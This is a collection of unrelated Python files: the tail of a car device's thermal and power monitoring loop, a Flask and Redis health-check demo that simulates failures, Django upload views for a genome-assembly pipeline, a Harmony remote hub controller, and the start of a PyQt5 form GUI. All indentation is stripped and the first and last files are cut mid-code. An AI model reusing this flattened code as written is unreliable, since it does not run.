msg.deviceState.screenBrightnessPercent = HARDWARE.get_screen_brightness()
msg.deviceState.usbOnline = HARDWARE.get_usb_present()
current_filter.update(msg.deviceState.batteryCurrent / 1e6)
max_comp_temp = temp_filter.update(
max(max(msg.deviceState.cpuTempC), msg.deviceState.memoryTempC, max(msg.deviceState.gpuTempC))
)
if fan_controller is not None:
msg.deviceState.fanSpeedPercentDesired = fan_controller.update(max_comp_temp, onroad_conditions["ignition"])
is_offroad_for_5_min = (started_ts is None) and ((not started_seen) or (off_ts is None) or (sec_since_boot() - off_ts > 60 * 5))
if is_offroad_for_5_min and max_comp_temp > OFFROAD_DANGER_TEMP:
# If device is offroad we want to cool down before going onroad
# since going onroad increases load and can make temps go over 107
thermal_status = ThermalStatus.danger
else:
current_band = THERMAL_BANDS[thermal_status]
band_idx = list(THERMAL_BANDS.keys()).index(thermal_status)
if current_band.min_temp is not None and max_comp_temp < current_band.min_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx - 1]
elif current_band.max_temp is not None and max_comp_temp > current_band.max_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx + 1]
# **** starting logic ****
# Ensure date/time are valid
now = datetime.datetime.utcnow()
startup_conditions["time_valid"] = (now.year > 2020) or (now.year == 2020 and now.month >= 10)
set_offroad_alert_if_changed("Offroad_InvalidTime", (not startup_conditions["time_valid"]))
startup_conditions["up_to_date"] = params.get("Offroad_ConnectivityNeeded") is None or params.get_bool("DisableUpdates") or params.get_bool("SnoozeUpdate")
startup_conditions["not_uninstalling"] = not params.get_bool("DoUninstall")
startup_conditions["accepted_terms"] = params.get("HasAcceptedTerms") == terms_version
# with 2% left, we killall, otherwise the phone will take a long time to boot
startup_conditions["free_space"] = msg.deviceState.freeSpacePercent > 2
startup_conditions["completed_training"] = params.get("CompletedTrainingVersion") == training_version or \
params.get_bool("Passive")
startup_conditions["not_driver_view"] = not params.get_bool("IsDriverViewEnabled")
startup_conditions["not_taking_snapshot"] = not params.get_bool("IsTakingSnapshot")
# if any CPU gets above 107 or the battery gets above 63, kill all processes
# controls will warn with CPU above 95 or battery above 60
onroad_conditions["device_temp_good"] = thermal_status < ThermalStatus.danger
set_offroad_alert_if_changed("Offroad_TemperatureTooHigh", (not onroad_conditions["device_temp_good"]))
# TODO: this should move to TICI.initialize_hardware, but we currently can't import params there
if TICI:
if not os.path.isfile("/persist/comma/living-in-the-moment"):
if not Path("/data/media").is_mount():
set_offroad_alert_if_changed("Offroad_StorageMissing", True)
else:
# check for bad NVMe
try:
with open("/sys/block/nvme0n1/device/model") as f:
model = f.read().strip()
if not model.startswith("Samsung SSD 980") and params.get("Offroad_BadNvme") is None:
set_offroad_alert_if_changed("Offroad_BadNvme", True)
cloudlog.event("Unsupported NVMe", model=model, error=True)
except Exception:
pass
# Handle offroad/onroad transition
should_start = all(onroad_conditions.values())
if started_ts is None:
should_start = should_start and all(startup_conditions.values())
if should_start != should_start_prev or (count == 0):
params.put_bool("IsOnroad", should_start)
params.put_bool("IsOffroad", not should_start)
params.put_bool("IsEngaged", False)
engaged_prev = False
HARDWARE.set_power_save(not should_start)
if sm.updated['controlsState']:
engaged = sm['controlsState'].enabled
if engaged != engaged_prev:
params.put_bool("IsEngaged", engaged)
engaged_prev = engaged
try:
with open('/dev/kmsg', 'w') as kmsg:
kmsg.write(f"<3>[thermald] engaged: {engaged}\n")
except Exception:
pass
if should_start:
off_ts = None
if started_ts is None:
started_ts = sec_since_boot()
started_seen = True
else:
if onroad_conditions["ignition"] and (startup_conditions != startup_conditions_prev):
cloudlog.event("Startup blocked", startup_conditions=startup_conditions, onroad_conditions=onroad_conditions)
started_ts = None
if off_ts is None:
off_ts = sec_since_boot()
# Offroad power monitoring
power_monitor.calculate(peripheralState, onroad_conditions["ignition"])
msg.deviceState.offroadPowerUsageUwh = power_monitor.get_power_used()
msg.deviceState.carBatteryCapacityUwh = max(0, power_monitor.get_car_battery_capacity())
current_power_draw = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power_draw is not None:
statlog.sample("power_draw", current_power_draw)
msg.deviceState.powerDrawW = current_power_draw
else:
msg.deviceState.powerDrawW = 0
# Check if we need to disable charging (handled by boardd)
msg.deviceState.chargingDisabled = power_monitor.should_disable_charging(onroad_conditions["ignition"], in_car, off_ts)
# Check if we need to shut down
if power_monitor.should_shutdown(peripheralState, onroad_conditions["ignition"], in_car, off_ts, started_seen):
cloudlog.warning(f"shutting device down, offroad since {off_ts}")
params.put_bool("DoShutdown", True)
msg.deviceState.chargingError = current_filter.x > 0. and msg.deviceState.batteryPercent < 90 # if current is positive, then battery is being discharged
msg.deviceState.started = started_ts is not None
msg.deviceState.startedMonoTime = int(1e9*(started_ts or 0))
last_ping = params.get("LastAthenaPingTime")
if last_ping is not None:
msg.deviceState.lastAthenaPingTime = int(last_ping)
msg.deviceState.thermalStatus = thermal_status
pm.send("deviceState", msg)
should_start_prev = should_start
startup_conditions_prev = startup_conditions.copy()
# Log to statsd
statlog.gauge("free_space_percent", msg.deviceState.freeSpacePercent)
statlog.gauge("gpu_usage_percent", msg.deviceState.gpuUsagePercent)
statlog.gauge("memory_usage_percent", msg.deviceState.memoryUsagePercent)
for i, usage in enumerate(msg.deviceState.cpuUsagePercent):
statlog.gauge(f"cpu{i}_usage_percent", usage)
for i, temp in enumerate(msg.deviceState.cpuTempC):
statlog.gauge(f"cpu{i}_temperature", temp)
for i, temp in enumerate(msg.deviceState.gpuTempC):
statlog.gauge(f"gpu{i}_temperature", temp)
statlog.gauge("memory_temperature", msg.deviceState.memoryTempC)
statlog.gauge("ambient_temperature", msg.deviceState.ambientTempC)
for i, temp in enumerate(msg.deviceState.pmicTempC):
statlog.gauge(f"pmic{i}_temperature", temp)
for i, temp in enumerate(last_hw_state.nvme_temps):
statlog.gauge(f"nvme_temperature{i}", temp)
for i, temp in enumerate(last_hw_state.modem_temps):
statlog.gauge(f"modem_temperature{i}", temp)
statlog.gauge("fan_speed_percent_desired", msg.deviceState.fanSpeedPercentDesired)
statlog.gauge("screen_brightness_percent", msg.deviceState.screenBrightnessPercent)
# report to server once every 10 minutes
if (count % int(600. / DT_TRML)) == 0:
cloudlog.event("STATUS_PACKET",
count=count,
pandaStates=[strip_deprecated_keys(p.to_dict()) for p in pandaStates],
peripheralState=strip_deprecated_keys(peripheralState.to_dict()),
location=(strip_deprecated_keys(sm["gpsLocationExternal"].to_dict()) if sm.alive["gpsLocationExternal"] else None),
deviceState=strip_deprecated_keys(msg.to_dict()))
count += 1
def main():
hw_queue = queue.Queue(maxsize=1)
end_event = threading.Event()
threads = [
threading.Thread(target=hw_state_thread, args=(end_event, hw_queue)),
threading.Thread(target=thermald_thread, args=(end_event, hw_queue)),
]
for t in threads:
t.start()
try:
while True:
time.sleep(1)
if not all(t.is_alive() for t in threads):
break
finally:
end_event.set()
for t in threads:
t.join()
if __name__ == "__main__":
main()
|
health.py
|
import datetime
import time
import threading
import redis
from flask import Flask, jsonify
from random import randint
OK = 'OK'
app = Flask(__name__)
app.healthy = True
r = redis.Redis()
APP_NAME = "TESTABLE_HEALTH_APP"
def update_health(status):
if status:
r.setex(APP_NAME, 5, status)
else:
print(f"{datetime.datetime.now()} : HEALTH HAS FAILED")
r.delete(APP_NAME)
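# Background worker: refreshes the Redis health key every interval and occasionally simulates a failure, marking the app unhealthy for 30 seconds.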
class ThreadingTest(object):
def __init__(self, interval=1):
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
while True:
if randint(0,100) <= 1:
#raise Exception("Faking a database error.")
app.healthy = False
update_health(None)
time.sleep(30)
else:
update_health(OK)
time.sleep(self.interval)
tr = ThreadingTest()
class InvalidUsage(Exception):
status_code = 400
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
def do_work():
if not app.healthy:
raise Exception("Faking a database error.")
return {"status": "ok"}
@app.errorhandler(InvalidUsage)
def handle_invalid_usage(error):
response = jsonify(error.to_dict())
response.status_code = error.status_code
return response
@app.route('/send/email', methods=['POST'])
def get_tasks():
try:
return_value = do_work()
update_health(OK)
return jsonify(return_value)
except Exception:
update_health(None)
raise InvalidUsage("Database connection has failed.", status_code=500)
|
views.py
|
from django.shortcuts import render
from django.views.generic.edit import CreateView
from django.urls import reverse_lazy
from django.http import HttpResponse
from genome_assembly.functions.functions import *
from genome_assembly.forms import *
from genome_assembly.genome_assembly_pipeline.pipeline import call_main
from genome_assembly.dummy_pipeline import dummy_pipeline
from uuid import uuid4
from threading import Thread
from genome_assembly.functions import env_switch
import os
# Create your views here.
#threading functions
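# Thin wrappers so each pipeline stage can be launched on a background Thread via env_switch.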
def call_genomeAssembly_thread(filepath):
#print('calling the genome assembly pipeline')
env_switch.run_genomeAssembly(filepath)
def call_genePrediction_thread(filepath):
#print('calling the gene prediction pipeline')
env_switch.run_genePrediction(filepath)
def call_functionalAnnotation_thread(filepath):
#print('calling the functional annotation pipeline')
env_switch.run_functionalAnnotation(filepath)
def call_comparitiveGenomics_thread(filepath):
#print('calling the comparative genomics pipeline')
env_switch.run_comparitiveGenomics(filepath)
def index(request):
return render(request, "genome_assembly/index.html")
#function to run the assembly
def run_assembly(request):
#return render(request, "uploader/genome_assembly_form.html")
if request.method == 'POST':
ga = genome_assembly_form(request.POST, request.FILES)
if ga.is_valid():
#this is the place where I need to generate the ID and give it to the user
#instead of returning the http response, redirect the user to the page with the link to the output.
#how do I save the post information?
#figure out how to use models here
print(request.POST)
file_name = request.FILES['file']
handle_uploaded_file(request.FILES['file'])
#post to the model db here, get a uuid for that request and generate a folder in that name
folder_name = uuid4().hex[:15]
filepath = ga_unzip_and_move(file_name, folder_name)
#call_main(i=filepath, S=True, l=True)
#calling the dummy pipeline here
t = Thread(target=call_genomeAssembly_thread, args=(filepath, ))
#t.setDaemon(True)
t.start()
#dummy_pipeline.call_main(filepath, ga=True)
#for the actual pipeline call, the helper function to change the environment will be given.
#after this is called, this has to render something temp page
return HttpResponse("File uploaded successfully")
else:
print('form is not valid')
else:
ga = genome_assembly_form()
return render(request,"genome_assembly/genome_assembly.html",{'form':ga})
#function to run gene_prediction
def run_geneprediction(request):
#return render(request, "uploader/genome_assembly_form.html")
if request.method == 'POST':
gp = gene_prediction_form(request.POST, request.FILES)
if gp.is_valid():
#this is the place where I need to generate the ID and give it to the user
#instead of returning the http response, redirect the user to the page with the link to the output.
#how do I save the post information?
#figure out how to use models here
print(request.POST)
file_name = request.FILES['file']
handle_uploaded_file(request.FILES['file'])
#post to the model db here, get a uuid for that request and generate a folder in that name
folder_name = uuid4().hex[:15]
filepath = gp_unzip_and_move(file_name, folder_name)
#make the call to the pipeline here
#make the call to the dummy pipeline here.
t = Thread(target=call_genePrediction_thread, args=(filepath, ))
t.start()
#dummy_pipeline.call_main(filepath, gp=True)
#call_main(i=filepath, S=True, l=True)
#after this is called, this has to render something temp page
return HttpResponse("File uploaded successfully")
else:
print('form is not valid')
else:
gp = gene_prediction_form()
return render(request,"genome_assembly/gene_prediction.html",{'form':gp})
#function to run functional annotation
def run_functionalAnnotation(request):
#return render(request, "uploader/genome_assembly_form.html")
if request.method == 'POST':
fa = functional_annotation_form(request.POST, request.FILES)
if fa.is_valid():
#this is the place where I need to generate the ID and give it to the user
#instead of returning the http response, redirect the user to the page with the link to the output.
#how do I save the post information?
#figure out how to use models here
print(request.POST)
file_name = request.FILES['file']
handle_uploaded_file(request.FILES['file'])
#post to the model db here, get a uuid for that request and generate a folder in that name
folder_name = uuid4().hex[:15]
filepath = fa_unzip_and_move(file_name, folder_name)
#make the call to the pipeline here
#make the call to the dummy pipeline here.
t = Thread(target=call_functionalAnnotation_thread, args=(filepath, ))
t.start()
#dummy_pipeline.call_main(filepath, fa=True)
#call_main(i=filepath, S=True, l=True)
#after this is called, this has to render something temp page
return HttpResponse("File uploaded successfully")
else:
print('form is not valid')
else:
fa = functional_annotation_form()
return render(request,"genome_assembly/functional_annotation.html",{'form':fa})
#function to run comparative genomics
def run_comparitiveGenomics(request):
#return render(request, "uploader/genome_assembly_form.html")
if request.method == 'POST':
cg = comparitive_genomics_form(request.POST, request.FILES)
if cg.is_valid():
#this is the place where I need to generate the ID and give it to the user
#instead of returning the http response, redirect the user to the page with the link to the output.
#how do I save the post information?
#figure out how to use models here
print(request.POST)
file_name = request.FILES['file']
handle_uploaded_file(request.FILES['file'])
#post to the model db here, get a uuid for that request and generate a folder in that name
folder_name = uuid4().hex[:15]
filepath = cg_unzip_and_move(file_name, folder_name)
#make the call to the pipeline here
#make the call to the dummy pipeline here.
t = Thread(target=call_comparitiveGenomics_thread, args=(filepath, ))
t.start()
#dummy_pipeline.call_main(filepath, cg=True)
#call_main(i=filepath, S=True, l=True)
#after this is called, this has to render something temp page
return HttpResponse("File uploaded successfully")
else:
print('form is not valid')
else:
cg = comparitive_genomics_form()
return render(request,"genome_assembly/comparitive_genomics.html",{'form':cg})
#dynamic link generation - send the link to the folder as a variable in a dictionary, this has to be specific to each results page.
def results(request, variable):
print(variable)
filepath = 'genome_assembly/genome_assembly_data/' + variable
print(filepath)
rs_dict = {}
rs_dict['contig'] = filepath
rs_dict['quast'] = filepath
rs_dict['qc'] = filepath
#helper function to get the file of fasta and html (just do a .endswith)
return render(request, "genome_assembly/upload_success.html", {'data':rs_dict})
|
harmonyNode.py
|
#############################################
## harmonyNode
#############################################
print('Load harmonyNode.py')
import sys, os, io, time, traceback, threading, asyncio, json, importlib
path = os.path.join('/aioharmony', os.path.dirname(__file__))
sys.path.append(path)
path = os.path.join(os.path.dirname(__file__), '../../imports/network')
sys.path.append(path)
path = os.path.join(os.path.dirname(__file__), './hubs')
sys.path.append(path)
from aioharmony.harmonyapi import HarmonyAPI, SendCommandDevice
from aioharmony.const import ClientCallbackType, WEBSOCKETS, XMPP
import wsClient, aioharmony.__main__ as harmonyHub, harmonyOptions, noteTool
_hubOptions = {}
#############################################
async def setDevice(note):
#############################################
try:
zone = note['content'].get('zone', None)
if(harmonyOptions.hubs.get(zone, None) == None):
return print(f'Abort receivedNote, invalid zone: {zone}')
if(harmonyOptions.hubs[zone].get('config', None) == None):
client = await harmonyHub.get_client(harmonyOptions.hubs[zone]['ip'], WEBSOCKETS, False)
print(f"\t {json.dumps(client.json_config, sort_keys=True, indent=4)}")
class commandArgs:
device_id = 'Amazon Fire TV'
command = 'OK'
repeat_num = 1
hold_secs = 0
delay_secs = 0
await harmonyHub.send_command(client, commandArgs)
except:
print('Abort setDevice: ', sys.exc_info()[0])
traceback.print_exc()
#############################################
async def receivedNote(note, connection):
#############################################
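# Validate the note's zone and controlWord, lazily import the per-zone options module, reuse or open the hub connection, then send the mapped command or start the activity.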
try:
print(f' \n***receivedNote: {note}')
# validate zone
zone = note['content'].get('zone', None)
if(zone == None):
return print(f'Abort receivedNote, invalid zone: {zone}')
# validate controlWord
controlWord = note['content'].get('controlWord', None)
if(controlWord == None):
return print(f'Abort receivedNote, invalid controlWord: {controlWord}')
#validate hub
if(_hubOptions.get(zone, None) == None): _hubOptions[zone] = importlib.import_module(zone)
if(_hubOptions.get(zone, None) == None): return print(f'Abort receivedNote, invalid zone: {zone}')
options = _hubOptions[zone]
# validate controlCommand
controlCommand = options.controlWordMap.get(controlWord, None)
if(controlCommand == None):
return print(f'Abort receivedNote, invalid controlCommand for {controlWord}')
# validate connection
connection = getattr(options, 'connection', None)
if(connection == None):
hubIp = options.hubIp
connection = await harmonyHub.get_client(hubIp, WEBSOCKETS, False)
options.connection = connection
print(f"***Hub Config:\n{json.dumps(connection.json_config, sort_keys=True, indent=4)}")
print(json.dumps(connection.json_config, sort_keys=True, indent=4), file=open(f'/smartRemotes/{zone}.hubConfig', 'w'))
# send device control command
print(f' \n***Send controlCommand: {controlCommand}')
class properties:
if(controlCommand['deviceID'] == -1):
activity = controlCommand['command']
else:
device_id = controlCommand['deviceID']
command = controlCommand['command']
repeat_num = controlCommand['repeatNum']
hold_secs = controlCommand['holdSecs']
delay_secs = controlCommand['delaySecs']
if(controlCommand['deviceID'] == -1):
await harmonyHub.start_activity(connection, properties)
else:
await harmonyHub.send_command(connection, properties)
except:
print('Abort receivedNote: ', sys.exc_info()[0])
traceback.print_exc()
#############################################
async def hubConnected(connection):
#############################################
print(f' \n***hubConnected')
note = noteTool.publishNote('harmonyNode', 'subscribe', {
'title': 'control harmonyHub request'
})
await wsClient.deliverNote(note, connection)
print(f' \n***Wait for \'{note["content"]["title"]}\' notes...')
print(f'*********************************************************')
#############################################
## MAIN
#############################################
try:
time.sleep(3)
#Start wsClient Module
try:
thread = threading.Thread(target=wsClient.start, args=(harmonyOptions.wsClient,))
thread.start()
time.sleep(1)
except:
print('Abort run wsClient: ', sys.exc_info()[0])
traceback.print_exc()
except:
print('Abort zoneNode', sys.exc_info()[0])
traceback.print_exc()
|
gui.py
|
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QGraphicsDropShadowEffect
import process
from threading import Thread
import time
from process import loading,time_tk,limite
import json
from PIL import Image
import os
import face_recognition as frc
import numpy as np
#Setting up the load class
limite = 100
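# Worker thread driving the circular progress indicators: a quick 0-100 sweep first, then progress derived from the process.time_tk timings.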
class External(QtCore.QThread):
signal = QtCore.pyqtSignal(int)
signal_ = QtCore.pyqtSignal(int)
def run(self):
count = 0
while count < limite:
count += 1
time.sleep(0.01)
self.signal.emit(count)
count = 0
while count < process.limite:
time.sleep(process.time_tk[count])
count +=1
self.signal_.emit(int((count/process.limite)*100))
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
global path
global path_2
path_2 = None
path = None
self.width = 1400
self.height = 720
MainWindow.resize(self.width,self.height)
MainWindow.setStyleSheet("background-color: rgb(24, 24, 24);")
self.color1 = QtGui.QColor(0, 0, 0)
self.color2 = QtGui.QColor(20, 182, 216)
self.color3 = QtGui.QColor(255, 40, 59)
id = QtGui.QFontDatabase.addApplicationFont("./src/fonts/neuropolitical rg.ttf")
fontstr = QtGui.QFontDatabase.applicationFontFamilies(id)[0]
tab_font = QtGui.QFont(fontstr)
tab_font.setPointSize(10)
tab_font.setBold(False)
tab_font.setItalic(False)
tab_font.setWeight(5)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
self.tabWidget.setGeometry(QtCore.QRect(0, 0, 1400,720))
self.tabWidget.setObjectName("tabWidget")
self.tabWidget.setStyleSheet("QTabBar::tab {padding:5px;background-color:rgba(0,255,255,0.2);border:0.5px solid rgb(99, 255, 255);color:rgb(99, 255, 255)} QTabBar::tab:selected {background-color:rgba(0,255,255,0.4)}")
self.tabWidget.setFont(tab_font)
self.shadow_tab = QtWidgets.QGraphicsDropShadowEffect(self.tabWidget,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(99, 255, 255))
self.tabWidget.setGraphicsEffect(self.shadow_tab)
self.tab_2 = QtWidgets.QWidget()
self.tab_2.setObjectName("tab_2")
self.tab_22 = QtWidgets.QWidget(self.tab_2)
self.tab_22.setGeometry(QtCore.QRect(0, 0, 1400,720))
self.tab_22.setObjectName("tab_22")
self.tab_22.setStyleSheet("#tab_22{border-image:url('./src/images/hud_n-1.png');background-attachment: fixed;}")
self.tabWidget.addTab(self.tab_2, "")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
self.tab_11 = QtWidgets.QWidget(self.tab)
self.tab_11.setGeometry(QtCore.QRect(0, 0, 1400,720))
self.tab_11.setObjectName("tab_11")
self.tab_11.setStyleSheet("#tab_11{border-image:url('./src/images/hud_.png');background-attachment: fixed;}")
id = QtGui.QFontDatabase.addApplicationFont("./src/fonts/neuropolitical rg.ttf")
fontstr = QtGui.QFontDatabase.applicationFontFamilies(id)[0]
font1 = QtGui.QFont(fontstr)
font_ = QtGui.QFont(fontstr)
id = QtGui.QFontDatabase.addApplicationFont("./src/fonts/neuropolitical rg.ttf")
fontstr = QtGui.QFontDatabase.applicationFontFamilies(id)[0]
font_.setPointSize(15)
font_.setBold(False)
font_.setItalic(False)
font_.setWeight(5)
self.contact = QtWidgets.QLabel(self.tab)
self.contact.setText("Contact Informations :")
self.contact.setObjectName("text_contact")
self.contact.setGeometry(QtCore.QRect(750,10,600,100))
self.contact.setStyleSheet("#text_contact{background:transparent;color:rgb(99, 255, 255);}")
self.contact.setFont(font_)
self.shadow_con = QtWidgets.QGraphicsDropShadowEffect(self.contact,blurRadius=40,xOffset=1,yOffset=1,color=QtGui.QColor(7, 179, 150))
self.contact.setGraphicsEffect(self.shadow_con)
self.gen = QtWidgets.QLabel(self.tab)
self.gen.setText("General Informations :")
self.gen.setObjectName("text_contact")
self.gen.setGeometry(QtCore.QRect(60,10,600,100))
self.gen.setStyleSheet("#text_contact{background:transparent;color:rgb(99, 255, 255);}")
self.gen.setFont(font_)
self.shadow_con = QtWidgets.QGraphicsDropShadowEffect(self.gen,blurRadius=40,xOffset=1,yOffset=1,color=QtGui.QColor(7, 179, 150))
self.gen.setGraphicsEffect(self.shadow_con)
self.id_upload = QtWidgets.QPushButton(self.tab)
self.id_upload.setEnabled(True)
self.id_upload.setGeometry(QtCore.QRect(40, 100-30, 200, 200))
self.shadow_ = QtWidgets.QGraphicsDropShadowEffect(self.id_upload,blurRadius=40,xOffset=1,yOffset=1,color=QtGui.QColor(7, 179, 150))
self.id_upload.setObjectName("id_upload")
self.id_upload.setStyleSheet("#id_upload{background:transparent;border-image:url('./src/images/image-1.png');}")
self.id_upload.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.id_upload.setMouseTracking(True)
self.id_upload.setGraphicsEffect(self.shadow_)
self.id_upload.clicked.connect(self.img_select_2)
self.plainTextEdit_4 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_4.setGeometry(QtCore.QRect(240, 120, 201, 31))
self.plainTextEdit_4.setObjectName("plainTextEdit_4")
self.plainTextEdit_4.setStyleSheet("#plainTextEdit_4:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_4{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_4.setFont(font1)
self.plainTextEdit_4.setPlaceholderText("First Name")
self.plainTextEdit_2 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_2.setGeometry(QtCore.QRect(240, 210-30, 201, 31))
self.plainTextEdit_2.setObjectName("plainTextEdit_2")
self.plainTextEdit_2.setStyleSheet("#plainTextEdit_2:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_2{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_2.setFont(font1)
self.plainTextEdit_2.setPlaceholderText("Last Name")
self.plainTextEdit_5 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_5.setGeometry(QtCore.QRect(80, 300-30, 131, 31))
self.plainTextEdit_5.setObjectName("plainTextEdit_5")
self.plainTextEdit_5.setStyleSheet("#plainTextEdit_5:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_5{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_5.setFont(font1)
self.plainTextEdit_5.setPlaceholderText("Day")
self.plainTextEdit_9 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_9.setObjectName(u"plainTextEdit_9")
self.plainTextEdit_9.setGeometry(QtCore.QRect(240, 300-30, 131, 31))
self.plainTextEdit_9.setStyleSheet("#plainTextEdit_9:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_9{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_9.setFont(font1)
self.plainTextEdit_9.setPlaceholderText("Month")
self.plainTextEdit_55 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_55.setGeometry(QtCore.QRect(400, 300-30, 131, 31))
self.plainTextEdit_55.setObjectName("plainTextEdit_5")
self.plainTextEdit_55.setStyleSheet("#plainTextEdit_5:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_5{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_55.setFont(font1)
self.plainTextEdit_55.setPlaceholderText("Year")
self.plainTextEdit_3 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_3.setGeometry(QtCore.QRect(80, 350-30, 131, 31))
self.plainTextEdit_3.setObjectName("plainTextEdit_3")
self.plainTextEdit_3.setStyleSheet("#plainTextEdit_3:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_3{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_3.setFont(font1)
self.plainTextEdit_3.setPlaceholderText("Country")
self.plainTextEdit_6 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_6.setGeometry(QtCore.QRect(240, 350-30, 131, 31))
self.plainTextEdit_6.setObjectName("plainTextEdit_6")
self.plainTextEdit_6.setStyleSheet("#plainTextEdit_6:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_6{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_6.setFont(font1)
self.plainTextEdit_6.setPlaceholderText("City")
self.plainTextEdit = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit.setGeometry(QtCore.QRect(80, 400-30, 131, 31))
self.plainTextEdit.setObjectName("plainTextEdit")
self.plainTextEdit.setStyleSheet("#plainTextEdit:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit.setFont(font1)
self.plainTextEdit.setPlaceholderText("Gender")
self.plainTextEdit_10 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_10.setObjectName(u"plainTextEdit_10")
self.plainTextEdit_10.setGeometry(QtCore.QRect(80, 450-30, 291, 31))
self.plainTextEdit_10.setStyleSheet("#plainTextEdit_10:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_10{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_10.setFont(font1)
self.plainTextEdit_10.setPlaceholderText("Job")
self.plainTextEdit_11 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_11.setObjectName(u"plainTextEdit_11")
self.plainTextEdit_11.setGeometry(QtCore.QRect(80, 500-30, 291, 31))
self.plainTextEdit_11.setStyleSheet("#plainTextEdit_11:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_11{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_11.setFont(font1)
self.plainTextEdit_11.setPlaceholderText("Work location")
#CONTACT Informations
self.plainTextEdit_111 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_111.setObjectName(u"plainTextEdit_11")
self.plainTextEdit_111.setGeometry(QtCore.QRect(800, 120, 291, 31))
self.plainTextEdit_111.setStyleSheet("#plainTextEdit_11:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_11{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_111.setFont(font1)
self.plainTextEdit_111.setPlaceholderText("Phone Number 1")
self.plainTextEdit_222 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_222.setObjectName(u"plainTextEdit_11")
self.plainTextEdit_222.setGeometry(QtCore.QRect(800, 170, 291, 31))
self.plainTextEdit_222.setStyleSheet("#plainTextEdit_11:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_11{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_222.setFont(font1)
self.plainTextEdit_222.setPlaceholderText("Phone Number 2")
self.plainTextEdit_333 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_333.setObjectName(u"plainTextEdit_11")
self.plainTextEdit_333.setGeometry(QtCore.QRect(800, 170+50, 291, 31))
self.plainTextEdit_333.setStyleSheet("#plainTextEdit_11:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_11{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
